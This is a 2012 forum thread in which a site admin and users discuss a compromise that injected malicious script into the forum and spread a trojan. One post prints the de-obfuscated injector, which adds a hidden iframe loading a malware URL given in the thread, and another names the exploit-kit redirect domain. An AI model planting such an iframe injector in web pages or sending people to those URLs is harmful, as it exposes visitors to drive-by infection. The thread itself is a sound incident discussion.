Marsh Posted January 7, 2012 Author Share Posted January 7, 2012 As some of you know we have been experiencing some site issues today. I have done my best to fix the ones that i have noticed thus far but if anything is displaying errors or working improperly please let me know immediately.Looks like some of the forum files have been modified without my knowledge to include some odd script. I have changed the password and currently am the only person with access. Though i am currently not sure if the changes were made with a Login or an exploit. So if anything pops up please pm me. [Update]Think i found out how they got in. Looks like it was the old Eclipse chan april fools joke. That thing is crazy outdated and was still running for old times sake.[Update 2]Two people so far have reported being infected with a Trojan around the time of the attack. Please scan your computer for viruses. You will most likely not be effected if you were not online at the time the site was acting strangely.Please download Microsoft Security Essentials or your preferred virus scanner and run a scan.http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?name=Trojan%3aJS%2fBlacoleRef.T&threatid=2147652755Sorry for the inconvenience. The important thing is we dont blame Eclipse ;) Link to comment Share on other sites More sharing options...
ark0n Posted January 7, 2012 Share Posted January 7, 2012 Yeah dude i noticed it, i thought it was just my computer tweaking… Link to comment Share on other sites More sharing options...
Marsh Posted January 7, 2012 Author Share Posted January 7, 2012 Here is the script if anyone wants it.```We are running the latest version of SMF and i have removed an unneeded mods. Hopefully this will prevent any further exploits. But we will see. [/i]``` Link to comment Share on other sites More sharing options...
Myron Posted January 7, 2012 Share Posted January 7, 2012 Time to do some digging then. Link to comment Share on other sites More sharing options...
ark0n Posted January 7, 2012 Share Posted January 7, 2012 @Rusher:> Time to do some digging then.This hahah Link to comment Share on other sites More sharing options...
Marsh Posted January 7, 2012 Author Share Posted January 7, 2012 Yup, looks like a common enough problem. Just a matter of finding out how they got in. I only updated to the latest SMF a few days back so it may have already been in there. Link to comment Share on other sites More sharing options...
Myron Posted January 7, 2012 Share Posted January 7, 2012 @Marsh:> I only updated to the latest SMF a few days back so it may have already been in there.Would be strange considering that it only 'activated' today. Link to comment Share on other sites More sharing options...
Marsh Posted January 7, 2012 Author Share Posted January 7, 2012 Yea true Link to comment Share on other sites More sharing options...
Myron Posted January 7, 2012 Share Posted January 7, 2012 BUMP. Please read the updated reply from Marsh. Link to comment Share on other sites More sharing options...
emblem Posted January 7, 2012 Share Posted January 7, 2012 The script injects an invisible iframe into the site.Basically de-obfusticated it does this:```if (document.getElementsByTagName('body')[0]) {Â Â iframer();} else {Â Â document.write("");}function iframer() {Â Â var f = document.createElement('iframe');Â Â f.setAttribute('src', 'SEE SPOILER FOR URL');Â Â f.style.visibility = 'hidden';Â Â f.style.position = 'absolute';Â Â f.style.left = '0';Â Â f.style.top = '0';Â Â f.setAttribute('width', '10');Â Â f.setAttribute('height', '10');Â Â document.getElementsByTagName('body')[0].appendChild(f);}```Here's the url it goes to, on two lines. Don't blame me if something happens for visiting it:>! http://novikkoll.in/in.cgi?default Link to comment Share on other sites More sharing options...
Myron Posted January 7, 2012 Share Posted January 7, 2012 Eh, I'll see if I can get a Virtual Machine up to check that site out.. Link to comment Share on other sites More sharing options...
ark0n Posted January 7, 2012 Share Posted January 7, 2012 Good job Scootaloo! Link to comment Share on other sites More sharing options...
emblem Posted January 7, 2012 Share Posted January 7, 2012 The url seems to redirect to another site then 404 for me, not executing any exploits at all.Weird. xD Link to comment Share on other sites More sharing options...
evilbunnie Posted January 7, 2012 Share Posted January 7, 2012 Dude.Are you sure it's a legit 404? Link to comment Share on other sites More sharing options...
Marsh Posted January 7, 2012 Author Share Posted January 7, 2012 @Scootaloo:> The url seems to redirect to another site then 404 for me, not executing any exploits at all.> > Weird. xDYea redirects to adersersut.comWhich is on some malware site lists as: Directs to Exploit kit Link to comment Share on other sites More sharing options...
emblem Posted January 7, 2012 Share Posted January 7, 2012 Looks legit, as far as headers and page source.But I could be wrong. Run the site sandboxed, in a VM on a computer you don't care about that's firewalled on a network that's not related to your personal one. Link to comment Share on other sites More sharing options...
game_heaven Posted January 7, 2012 Share Posted January 7, 2012 Hello ,Im not sure if this is what caused my problem, my connection was working fine, I was disconnected when I loged back in it happened again,no one noes my eclipse account info Link to comment Share on other sites More sharing options...
Justn Posted January 7, 2012 Share Posted January 7, 2012 I always keep this site opened up on my pc and I noticed I kept getting logged out yesterday. Just thought it was me so I read this and ran my virus scanner and it found 3 traces of a trojan virus. removed them successfully hope all is good now =)EDIT: my anti-malware program keeps blocking that noviak website when i go to the main eclipse page though =/ I don't like to keep it running causes it slows my pc down but I will until it is fixed =p Link to comment Share on other sites More sharing options...
Whackeddie99 Posted January 8, 2012 Share Posted January 8, 2012 I'lll run my Virus scanner ASAP Link to comment Share on other sites More sharing options...
Guest Posted January 8, 2012 Share Posted January 8, 2012 I think I saw the virus was…It was on www.touchofdeathforums.com/smf/My KIS(Kaspersky Internet Security) Detected it there. Link to comment Share on other sites More sharing options...
Dreams Posted January 8, 2012 Share Posted January 8, 2012 I got some virus alerts on the site. My first thought = 'Robin's Trying to Steal Our Info!!!'But as it seems, everything's gonna be ok.I assume that it is safe to still be here if I have MSE and it seems to be catching the viruses? Link to comment Share on other sites More sharing options...
Likestodraw Posted January 8, 2012 Share Posted January 8, 2012 Yeah, while on here on two different computers, I've had Seccurity Essentials say that it detected a potential threat. I'm glad it's being cleared up! Link to comment Share on other sites More sharing options...
Robin Posted January 8, 2012 Share Posted January 8, 2012 @Dreams:> I got some virus alerts on the site. My first thought = 'Robin's Trying to Steal Our Info!!!'> But as it seems, everything's gonna be ok.> I assume that it is safe to still be here if I have MSE and it seems to be catching the viruses?Your information is worthless to me. I already have everything I'd need if I wanted to sell your personal information. Link to comment Share on other sites More sharing options...
Dreams Posted January 8, 2012 Share Posted January 8, 2012 Well, what's my social security number? Link to comment Share on other sites More sharing options...
Robin Posted January 8, 2012 Share Posted January 8, 2012 I have no idea what a social security number is. Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now